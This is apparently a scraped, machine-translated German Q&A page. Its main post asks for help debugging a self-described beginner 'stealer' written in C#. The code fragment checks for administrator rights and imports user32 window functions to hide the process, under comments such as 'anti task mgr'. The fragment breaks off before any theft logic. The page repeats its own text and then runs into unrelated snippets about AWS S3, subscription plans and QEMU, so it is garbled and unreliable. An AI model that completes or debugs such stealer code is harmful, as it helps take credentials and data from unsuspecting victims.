Ich habe derzeit an einem Projekt gearbeitet, das in C# auf VS 2022 ein grundlegender Diebstahl von Anfänger ist. Um dies zu programmieren, habe ich einzelne Teile des Codes gemacht und sie debuggen und sie zu einem großen Programm kombiniert, sobald sie alle funktional waren. Ich habe das Ziel -Framework in < /p>
geändert
Ich habe derzeit an einem Projekt gearbeitet, das in C# auf VS 2022 ein grundlegender Diebstahl von Anfänger ist. Um dies zu programmieren, habe ich einzelne Teile des Codes gemacht und sie debuggen und sie zu einem großen Programm kombiniert, sobald sie alle funktional waren. Ich habe das Ziel -Framework in < /p> geändert[code]"8.0-windows10.0.19041.0" < /code> und ich verwende die Erweiterung sowie die Erweiterung von Webanmeldeinformationen. Manchmal zeigt es in VS "keine Fehler gefunden", aber es läuft nicht. Stattdessen öffnet die Konsolenanwendung ein leeres Terminal mit der Standardeinstellung. "Drücken Sie eine beliebige Taste, um zu schließen". In anderen Fällen wird es mit Fehlermeldungen angezeigt.// machine name using System.Diagnostics; using System.Net.Sockets; using System.Net; using System.Security.Principal; using System.Text.RegularExpressions; using Microsoft.Win32;
// anti task mgr using System.Runtime.InteropServices; using Microsoft.Exchange.WebServices.Data; static bool IsUserAdministrator() { bool isAdmin; try { WindowsIdentity user = WindowsIdentity.GetCurrent(); WindowsPrincipal principal = new WindowsPrincipal(user); isAdmin = principal.IsInRole(WindowsBuiltInRole.Administrator); } catch (UnauthorizedAccessException ex) { isAdmin = false; } catch (Exception ex) { isAdmin = false; } return isAdmin; } namespace HiddenProcess { class Program { [DllImport("user32.dll")] static extern int GetWindowLong(IntPtr hWnd, int nIndex);
[DllImport("user32.dll")] static extern int SetWindowLong(IntPtr hWnd, int nIndex, int dwNewLong);
[DllImport("user32.dll")] static extern bool SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags);
const int GWL_STYLE = -16; const int WS_VISIBLE = 0x10000000; const int SWP_HIDEWINDOW = 0x0080;
Beim Erstellen einer Iamazons3 Client -Instanz in einem Lambda möchte ich den Standardkonstruktor wie folgt verwenden:
var client = new Amazones3Client();
Ich kann nicht in den Ausnahmebehandlercode eintreten, um festzustellen, wie die Problemdetails erstellt und als Antwort gesendet werden, wenn eine Ausnahme irgendwo in Code
geworfen wirdpublic...
Ich habe Basisplan für monatlich und jährlich mit 7 Tagen Angebot für beide, aber nur in monatlicher Darstellung nicht für jährlich. I.Sstatic.net/p1abtjfg.jpg />
Ich habe zwei Abonnementpläne: monatlich und jährlich, die beide ein 7-tägiges kostenloses Testangebot enthalten. Wenn Benutzer jedoch den jährlichen Plan auswählen, wird nur der Grundpreis angezeigt...
Ich habe die Schritte in befolgt, um einen tmp105-Temperatursensor mit QEMU zu simulieren:
Angenommen, Sie haben die Qemu-Quellen im qemu-Verzeichnis:
cd qemu
echo CONFIG_TMP105=y >>...